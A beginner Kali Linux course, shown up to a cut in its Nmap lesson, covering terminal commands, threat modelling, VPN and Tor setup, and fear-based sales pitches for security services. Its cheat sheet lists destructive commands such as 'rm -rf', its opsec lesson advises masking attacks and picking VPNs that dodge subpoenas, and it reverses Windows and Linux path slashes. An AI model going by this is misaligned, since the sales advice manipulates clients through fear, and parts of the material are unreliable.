Baixe o app para aproveitar ainda mais
Prévia do material em texto
Lesson 1: Introduction to Kali Linux Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution. Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer’s hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits. Introduction to Kali Linux :From kali website: Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution. Kali Linux Features Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS. More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality. Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux. Open source Git tree: We are huge proponents of open source software and our development tree is available for all to see and all sources are available for those who wish to tweak and rebuild packages. FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc. Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices. Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments so our kernel has the latest injection patches included. Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols. GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed and the repositories subsequently sign the packages as well. Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job. Completely customizable: ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali’s ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution so tools for ARM will be updated in conjunction with the rest of the distribution. Kali is currently available for the following ARM devices: - rk3306 mk/ss808 - Raspberry Pi - ODROID U2/X2 - Samsung Chromebook - EfikaMX - Beaglebone Black - CuBox - Galaxy Note 10.1 .................. Okay class, its important to realize that most of the commands in kali are GUI or graphic user interface unlike previous installations of backtrack which require terminal input. Terminal is like windows command prompt, with a derivative you will be quick to notice, in file paths in windows the slash is forwards \ In the linux enviroment, the slash is backwards / ***Important*** Filepaths are case sensitive and when launching a program you also have to type the extension. Ex. Root/user/admin/torhammer.py If you had the above program installed, the extension being ".py" would launch the program. Another cool thing about kali, and linux period, is if and when you learn a programming language, you can code your own programs in their "notepad" style program and save it as something like "hacklikeaboss.py" and it will save as a python file, then right click and change advanced settings to executable file andddddd voila! Your very own custom program has been created. Enough about kali, im sure youre ready to get started on lesson 2 Lesson 2 : Real World applications for kali, forming your own business, and introduction to terminal, the hacker's best friend. Lesson 2: Real World Applications for Kali Linux Greetings class: Real world applications for Kali Linux are very diverse. Incorperating them into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company. Small business examples: Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work from home. These are businesses that you will start with at first to build a reputation. Stressing the importance of Data Security to the customer is an integral part of the sales pitch. Looking up articles about local businesses around your area, and even college databases being breached can not only raise awareness, but also raise the fear factor. Ever heard the term a little fear is healthy? Well fear sells, and in todays day and age everyone is digital. Some people run their business sites via wordpress, even blog on them daily about events. This consumes a good portion of time for the client, and if someone were to access that because they had a faulty line of code in their site, they could not only lose their investment, but lose customers and customer data as well. A Kali Linux application for this would be a tool called wpscan, which we will review later on, but it scans the site for vulnerabilities allowing you to report them to the sitemaster or admin. Its illegal to scan without permission, always get permission. Another tool to use would be nmap This tool scans open ports on wifi connections Open ports are like open doors that anyone with the right knowledge can access, and access things like customer data, and even credit card transaction information. You will find when launching these programs via the drop down menu that they launch a sort of command prompt via a program called terminal. Kali is already preconfigured to run root access, so a tutorial in sudo isnt necessary. Terminal accepts your commands and runs basically every function on kali and this is where you will spend most of your time. Everytime you start kali, if its a live disk and not a full install, i recommend opening up a terminal first thing Then type apt-get update This updates the files You can also search for upgraded software apt-get upgrade Other commands are listed below System Info date – Show the current date and time cal – Show this month's calendar uptime – Show current uptime w – Display who is online whoami – Who you are logged in as finger user – Display information about user uname -a – Show kernel information cat /proc/cpuinfo – CPU information cat /proc/meminfo – Memoryinformation df -h – Show disk usage du – Show directory space usage free – Show memory and swap usage Keyboard Shortcuts Enter – Run the command Up Arrow – Show the previous command Ctrl + R – Allows you to type a part of the command you're looking for and finds it Ctrl + Z – Stops the current command, resume with fg in the foreground or bg in the background Ctrl + C – Halts the current command, cancel the current operation and/or start with a fresh new line Ctrl + L – Clear the screen command | less – Allows the scrolling of the bash command window using Shift + Up Arrowand Shift + Down Arrow !! – Repeats the last command command !$ – Repeats the last argument of the previous command Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it before executing the command Ctrl + A – Return to the start of the command you're typing Ctrl + E – Go to the end of the command you're typing Ctrl + U – Cut everything before the cursor to a special clipboard, erases the whole line Ctrl + K – Cut everything after the cursor to a special clipboard Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right, try it!) Ctrl + W – Delete the word / argument left of the cursor in the current line Ctrl + D – Log out of current session, similar to exit Learn the Commands apropos subject – List manual pages for subject man -k keyword – Display man pages containing keyword man command – Show the manual for command man -t man | ps2pdf - > man.pdf – Make a pdf of a manual page which command – Show full path name of command time command – See how long a command takes whereis app – Show possible locations of app which app – Show which app will be run by default; it shows the full path Searching grep pattern files – Search for pattern in files grep -r pattern dir – Search recursively for pattern in dir command | grep pattern – Search for pattern in the output of command locate file – Find all instances of file find / -name filename – Starting with the root directory, look for the file called filename find / -name ”*filename*” – Starting with the root directory, look for the file containing the string filename locate filename – Find a file called filename using the locate command; this assumes you have already used the command updatedb (see next) updatedb – Create or update the database of files on all file systems attached to the Linux root directory which filename – Show the subdirectory containing the executable file called filename grep TextStringToFind /dir – Starting with the directory called dir, look for and list all files containing TextStringToFind File Permissions chmod octal file – Change the permissions of file to octal, which can be found separately for user, group, and world by adding: 4 – read (r),2 – write (w), 1 – execute (x) Examples: chmod 777 – read, write, execute for all chmod 755 – rwx for owner, rx for group and world For more options, see man chmod. File Commands ls – Directory listing ls -l – List files in current directory using long format ls -laC – List all files in current directory in long format and display in columns ls -F – List files in current directory and indicate the file type ls -al – Formatted listing with hidden files cd dir – Change directory to dir cd – Change to home mkdir dir – Create a directory dir pwd – Show current directory rm name – Remove a file or directory called name rm -r dir – Delete directory dir rm -f file – Force remove file rm -rf dir – Force remove an entire directory dir and all it’s included files and subdirectories (use with extreme caution) cp file1 file2 – Copy file1 to file2 cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist cp file /home/dirname – Copy the filename called file to the /home/dirname directory mv file /home/dirname – Move the file called filename to the /home/dirname directory mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2 ln -s file link – Create symbolic link link to file touch file – Create or update file cat > file – Places standard input into file cat file – Display the file called file more file – Display the file called file one page at a time, proceed to next page using the spacebar head file – Output the first 10 lines of file head -20 file – Display the first 20 lines of the file called file tail file – Output the last 10 lines of file tail -20 file – Display the last 20 lines of the file called file tail -f file – Output the contents of file as it grows, starting with the last 10 lines Compression tar cf file.tar files – Create a tar named file.tar containing files tar xf file.tar – Extract the files from file.tar tar czf file.tar.gz files – Create a tar with Gzip compression tar xzf file.tar.gz – Extract a tar using Gzip tar cjf file.tar.bz2 – Create a tar with Bzip2 compression tar xjf file.tar.bz2 – Extract a tar using Bzip2 gzip file – Compresses file and renames it to file.gz gzip -d file.gz – Decompresses file.gz back to file Printing /etc/rc.d/init.d/lpd start – Start the print daemon /etc/rc.d/init.d/lpd stop – Stop the print daemon /etc/rc.d/init.d/lpd status – Display status of the print daemon lpq – Display jobs in print queue lprm – Remove jobs from queue lpr – Print a file lpc – Printer control tool man subject | lpr – Print the manual page called subject as plain text man -t subject | lpr – Print the manual page called subject as Postscript output printtool – Start X printer setup interface Network ifconfig – List IP addresses for all devices on the local machine iwconfig – Used to set the parameters of the network interface which are specific to the wireless operation (for example: the frequency) iwlist – used to display some additional information from a wireless network interface that is not displayed by iwconfig ping host – Ping host and output results whois domain – Get whois information for domain dig domain – Get DNS information for domain dig -x host – Reverse lookup host wget file – Download file wget -c file – Continue a stopped download SSH ssh user@host – Connect to host as user ssh -p port user@host – Connect to host on port port as user ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login User Administration adduser accountname – Create a new user call accountname passwd accountname – Give accountname a new password su – Log in as superuser from current login exit – Stop being superuser and revert to normal user Process Management ps – Display your currently active processes top – Display all running processes kill pid – Kill process id pid killall proc – Kill all processes named proc (use with extreme caution) bg – Lists stopped or background jobs; resume a stopped job in the background fg – Brings the most recent job to foreground fg n – Brings job n to the foreground Installation from source ./configure make make install dpkg -i pkg.deb – install a DEB package (Debian / Ubuntu / Linux Mint) rpm -Uvh pkg.rpm – install a RPM package (Red Hat / Fedora) Stopping & Starting shutdown -h now – Shutdown the system now and do not reboot halt – Stop all processes - same as above shutdown -r 5 – Shutdown the system in 5 minutes and reboot shutdown -r now – Shutdown the system now and reboot reboot – Stop all processes and then reboot - same as above startx – Start the X system Lesson 3: Threat assessment and how to sell it Good morning class, I hope you have had time toexperiment with terminal commands and familiarize yourelves with the file structure of Kali Linux. Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson will be on threat assessment. Now for a little roleplay. Company xyz is a fortune 500 company, who buys and trades domains on the market, processing credit cars and bank transactions, storing customer information on encrypted servers, and has an option for member sign up. You ask them and they say they are running sql databases. How would you approach the company to sell your business? Respond to this email with your answer. My answer will be included in lesson 4 Now on threat assessment, Modeling There is no single solution for keeping yourself safe online. Digital security isn’t about which tools you use; rather, it’s about understanding the threats you face and how you can counter those threats. To become more secure, you must determine what you need to protect, and whom you need to protect it from. Threats can change depending on where you’re located, what you’re doing, and whom you’re working with. Therefore, in order to determine what solutions will be best for you, you should conduct a threat modeling assessment. When conducting an assessment, there are five main questions you should ask yourself: What do you want to protect?Who do you want to protect it from?How likely is it that you will need to protect it?How bad are the consequences if you fail?How much trouble are you willing to go through in order to try to prevent those? When we talk about the first question, we often refer to assets, or the things that you are trying to protect. An assett is something you value and want to protect. When we are talking about digital security, the assets in question are usually information. For example, your emails, contact lists, instant messages, and files are all assets. Your devices are also assets. Write down a list of data that you keep, where it’s kept, who has access to it, and what stops others from accessing it. In order to answer the second question, “Who do you want to protect it from,” it’s important to understand who might want to target you or your information, or who is your adversary. An adversary is any person or entity that poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government, or a hacker on a public network. Make a list of who might want to get ahold of your data or communications. It might be an individual, a government agency, or a corporation. A threat is something bad that can happen to an asset. There are numerous ways that an adversary can threaten your data. For example, an adversary can read your private communications as they pass through the network, or they can delete or corrupt your data. An adversary could also disable your access to your own data. The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a video showing police violence may be content to simply delete or reduce the availability of that video, whereas a political opponent may wish to gain access to secret content and publish it without you knowing. Write down what your adversary might want to do with your private data. The capability of your attacker is also an important thing to think about. For example, your mobile phone provider has access to all of your phone records and therefore has the capability to use that data against you. A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might have stronger capabilities. A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to access all of your data, the risk of them posting your private data online to harm your reputation is low. It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where they are not). Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high risks because they don't view the threat as a problem. In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to be available than confidential. Now, let’s practice threat modeling. If you want to keep your house and possessions safe, here are a few questions you might ask: Should I lock my door?What kind of lock or locks should I invest in?Do I need a more advanced security system?What are the assets in this scenario?The privacy of my homeThe items inside my homeWhat is the threat?Someone could break in.What is the actual risk of someone breaking in? Is it likely? Once you have asked yourself these questions, you are in a position to assess what measures to take. If your possessions are valuable, but the risk of a break-in is low, then you probably won’t want to invest too much money in a lock. On the other hand, if the risk is high, you’ll want to get the best locks on the market, and perhaps even add a security system. Lesson 4: Opsec, VPN, Tor. Opsec stands for "operational security" and is a term coined by the special forces in the United States military. When it comes to hacking, Opsec is essential as to not let your opponent know that you are on to them. If you are hired to test the security already in place, it would be obvious that you would need to learn ways to mask your attacks. Virtual Private Networks or VPNs: What Is A VPN? A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the Internet) to a remote network/location. This remote network is typically a private network, such as a workplace or home network, or one provided by a commercial VPN service. A VPN can be thought to create a "tunnel" through the public network to your private network at the other end. All network traffic through this tunnel is encrypted to ensure it is kept secure and private. What Does A VPN Let Me Do? A VPN allows you to do a number of things you wouldn't otherwise be able to do connected to a standard network. This includes: Network Security & Privacy: All network traffic through your VPN connection is kept secure. This allows you to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network traffic, such as see what you are viewing, steal your information and login details, etc. Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you were physically in the office. You can then do things like access file servers, computers, databases, email, internal webpages, and other services you might not have access to outside of your work network. Access Your Home Network: Connecting back home using a VPN allows you to access your computers remotely. Accessfiles on your computer, view iTunes shares, take remote control of your computer, and access other services. Access Location Restricted Content: By connecting to a VPN server in another location you can make it appear to websites using geolocation that you are physically in the correct location for access. So when you're travelling overseas you can still view websites you would normally use at home, such as television, movie and music streaming websites. Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed, meaning that many applications like VOIP, instant messenging, video chat, and games will not work. However using a VPN you can tunnel through such restrictions and allow all of your network applications to work. Viscosity even allows you to tunnel through a HTTP or SOCKS proxies to establish your VPN connection. Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a VPN provides a way to still maintain access to the services you would normally use. Why Should I Use A VPN? Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the security and privacy of your network traffic. Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing, steal username and passwords, steal session information to be able to log into sites as you, and extract other private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only monitor in depth your network traffic, but also alter your traffic or inject their own in an attempt to fool a user into revealing important data. Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it secure and private. How Does A VPN Work? A typical VPN consists of two components: the VPN client and the VPN server. A VPN client is the software that allows a user to connect their computer to the VPN server and establish the VPN connection. It is installed on the user's computer and communicates with the VPN server to create a secure link for the user's network traffic. The VPN Client is what the end user uses to control their VPN connection. Viscosity performs the duties of a VPN client. A VPN server is setup at the location users want to connect to, such as at a workplace or at home. A VPN Server usually configured and maintained by IT staff, however home users often set up their own VPN personal VPN server at home or at a remote location as well. End users rarely have to interact with the VPN Server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN. All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it private and secure. What Is OpenVPN? OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption. Like IPSec and PPTP, OpenVPN handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to its high level of security, customizability, and compatibility with most network environments. VPN Service Providers There are many companies that specialize in providing a commercial VPN service. These companies are known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing you to not only get the security and privacy benefits on a VPN, but also making it easy to access websites that restrict access to certain counties. Most VPN Service Providers charge a small monthly or yearly fee for access to their servers, however there are also a number of free service providers. The key to choosing a quality vpn comes down to two factors, 1) do they cooperate with united states gov subpoenas 2 do they keep logs (you dont want logs) TorGuard TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the ability to connect to torrent-friendly services if you need to download something, encryption and anonymity- friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous proxy or a torrent proxy. Their full VPN service however features over 200 exit servers in 18 countries, no logging or data retention of any kind, and their network is set up in a way that they actually have no information to collect on their user activities—they don't know what you're doing or when you're connected. They delivered a really great response to Torrentfreak's questions that's well worth a read for more info. They also support multiple connectivity protocols, support for virtually every desktop and mobile OS, and even offer their customers encrypted, offshore email service if you want to take advantage. Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies.") You also noted that they support OpenVPN, help you get connected via your home network, and have great customer service. IPVanish VPN IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're compromising security though—they have over 14,0000 IPs to share on over a hundred exit servers in 47 different countries. You can choose where you'd prefer to connect, which again is perfect for getting around location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X, Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and Android, and they offer configuration utilities so you can set you home router to connect to them as well. They feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your activities, and only log a few things. Torrentfreak gave them the nod as well. Accounts with IPVanish are$10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols.) IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that they're happy with you streaming video or music while you're connected to get around pesky content blocks, especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back home or make use of their streaming music subscription. CyberGhost VPN CyberGhost has been around for a long time, they made a great showing in the call for contenders thread. Like any good, trustworthy VPN provider,they both encrypt all of the data that passes through your connection and anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the go, you may be able to get away with a free account. The service just went through a massive overhaul about a year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different countries (free users can pick from one of 14, still impressive for a free service), and you cansee server status at any time Their clients are easy to use, support virtually every mobile and desktop platforms, and they don't discriminate against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to get around their location-blocks.) The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 hours, and are limited to the official client, while pro accounts can use other connection protoctols and have way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if you need more than one device connected at any given time, you'll need to step up to Premium Plus, at $11/mo and $70/yr. Those of you who praised the service noted their great connection speeds, wealth of servers to choose from (even for free users). Read more in the nomination thread here. Do-It-Yourself Of course, no list of great options would be complete with the DIY approach. If you don't need exit servers in different countries, and your primary need is to encrypt and secure your data when you're away from home, you can roll yout own VPN with OpenVPN or a number of other free, open-source tools. Many of the best routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is that you get to set the level of encryption, you get complete control over who connects and who has access to what parts of your home network, and where your data goes from there. Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their VPN running there while they connect to it when necessary. The sky's the limit with the DIY option, it just takes the skill and knowhow to do it, and some compromise on the level of features and tools you get. We have more than a few honorable mentions this week, including one of my personal favorites, Hideman VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are the great people over at Tunnelbear, who are constantly working to improve and update their service to help you get around regional restrictions and blocks—-and recently unveiled a browser add-on to tunnel some services but not others, giving you even more control over your connection. We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly need. You can forward remote ports, pick and choose exit services in multiple countries, and even generate an OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to externally, they're worth a look. We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least log user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days. That's not an issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011on the topic, cagey with me when I last spoke to a rep from the company, andthis Reddit thread is rather illuminating as well. Still, there are signs thatthings may be changing with VyprVPN. The feature set and the face of the company both look good, and they combine Usenet with VPN services which is great, but we don't feel comfortable calling them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of your data. A final note—something we mentioned when we talked —don't fall into the geography trap, assuming that an overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who asks—and there are definitely VPN providers that fall in both categories Tor — a privacy oriented encrypted anonymizing service, has announced the launch of its next version of Tor Browser Bundle, i.e. Tor version 4.0.4, mostly supposed to improve the built-in utilities, privacy and security of online users on the Internet. Tor Browser helps users to browse the Internet in a complete anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox configured to protect the users’ anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere. NEW FEATURES The latest version, Tor Browser Bundle 4.0.4, has been recently released, with a few number of new features: Updated to Firefox to 31.5.0esr with important security updates.Update OpenSSL to 1.0.1lUpdate NoScript to 2.6.9.15Update HTTPS-Everywhere to 4.0.3 BUG FIXES Meanwhile, the new Tor version 4.0.4 also include some bugfixes:Bug 14203: Prevent meek from displaying an extra update notificationBug 14849: Remove new NoScript menu option to make permissions permanentBug 14851: Set NoScript pref to disable permanent permissions "A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team. Tor is generally thought to be a place where users come online to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy oriented service and is mostly used by activists, journalists to circumvent online censorship and surveillance efforts by various countries. However, late last year we have seen large scale cyber attack on Tor network that quietly seized some of its network specializedservers called Directory Authorities (DA), the servers that help Tor clients to find Tor relays in the anonymous network service. On the other end of the side, last month 12 high-capacity Tor Middle relays was launched by the Polaris — a new initiative by Mozilla, the Tor Project and the Center of Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity Tor middle relays to the Tor network helps reduce finite number of Tor connections occurring at the same time. Installing Tor in Kali Linux: Step 1: Getting tor service ready There are 3 ways of installing Tor service in Kali Linux. You can install Tor by following any of these options: Option #1: Install Tor from Kali Repository Tor is available in Kali repository, to install it directly from the repository open your Terminal and type this: apt-get install tor If no error occurs, follow the second step. Option #2: Install Tor from Debian Wheezy Repository If you can’t install Tor using the first method then you may try this option. In this way we are going to add the official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian and it uses the package management from “Wheezy”. So we are going to use “Wheezy” as our distribution. Now open your terminal and follow these steps: Step #1: Add repo to sources.list file Lets add the distribution in the list by opening the sources.list file leafpad /etc/apt/sources.list Now add the following line at the bottom of the file, deb http://deb.torproject.org/torproject.org wheezy main Step #2: Add GPG Keys Now we need to add the gpg key used to sign the packages by running the following commands: gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - Step #3: Update package lists Lets refresh our sources: apt-get update Step #4: Install singing keys Now, before installing the Tor we must add the signing key, apt-get install deb.torproject.org-keyring Step #5: Install Tor from Debian repository Finally, apt-get install tor Now Tor should be installed! If no error occurs, follow the second step. Option #3: Install Tor from development branch If you are an advanced user and you want to install Tor using the development branch then this method is for you. Step #1: Add Tor project repository to sources.list You need to add a different set of lines to your /etc/apt/sources.list file: deb http://deb.torproject.org/torproject.org wheezy main debhttp://deb.torproject.org/torproject.org tor- experimental-0.2.5.x- wheezy main Step #2: Add GPG keys, keyring and install Tor Then run the following commands at your command prompt: gpg --keyserver keys.gnupg.net --recv 886DDD89 gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add - apt-get update apt-get install tor deb.torproject.org-keyring Now Tor should be installed! If no error occurs, follow the second step. Note: This release will provide you more features but it contains bugs too. Option #4: Build and Install Tor from sources If you want to build your own debs from source you must first add an appropriate deb-srcline to sources.list. deb-src http://deb.torproject.org/torproject.org wheezy main deb- srchttp://deb.torproject.org/torproject.org wheezy main deb-srchttp://deb.torproject.org/torproject.org tor- experimental-0.2.5.x--wheezy main You also need to install the necessary packages to build your own debs and the packages needed to build Tor: apt-get install build-essential fakeroot devscripts apt-get build-dep tor Then you can build Tor in ~/debian-packages: mkdir ~/debian-packages; cd ~/debian-packages apt-get source tor cd tor-* debuild -rfakeroot -uc -us cd .. Now you can install the new package: dpkg -i tor_*.deb Step #2: Downloading and Running Tor bundle Download the Tor Bundle from here, https://www.torproject.org/projects/torbrowser.html.en Download the architecture-appropriate file above, save it somewhere, then run one of the following two commands to extract the package archive: tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz or (for the 64-bit version): tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz (where LANG is the language listed in the filename). Once that’s done, switch to the Tor browser directory by running: cd tor-browser_LANG (whereLANG is the language listed in the filename). To run the Tor Browser Bundle, execute the start-tor-browser script: ./start-tor-browser This will launch Vidalia and once that connects to Tor, it will launch Firefox. Note: Do not unpack or run TBB as root. (though in Kali Linux, it doesn’t make any differences) Lesson 5: Introduction to NMap Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration, its GUI is user friendly and boasts a wide variety of features. Nmap (“Network Mapper”) is a free and open source utility for network exploration and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available. This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and copyright. Nmap Overview and Demonstration Sometimes the best way to understand something is to see it in action. This section includes examples of Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand everything at once. This is simply a broad overview of features that are described in depth in later chapters. The “solutions” included throughout this book demonstrate many other common Nmap tasks for security auditors and network administrators. Avatar Online Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and fascination since a childhood spent learning everything he could about networking, security, Unix, and phone systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of network intrusions as before, but with the added benefit of contractual immunity fromprosecution and even a paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to announce that the sales department closed a pen-testing deal with the Avatar Online gaming company. Avatar Online (AO) is a small company working to create the next generation of massive multi-player online role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neil Stevenson's Snow Crash, is fascinating but still highly confidential. After witnessing the high-profile leak of Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities found. The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what IP address ranges the target is using, what hosts are available, what services those hosts are offering, general network topology details, and what firewall/filtering policies are in effect. Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network on 6.209.24.0/24 and their production/DMZ systems residing on 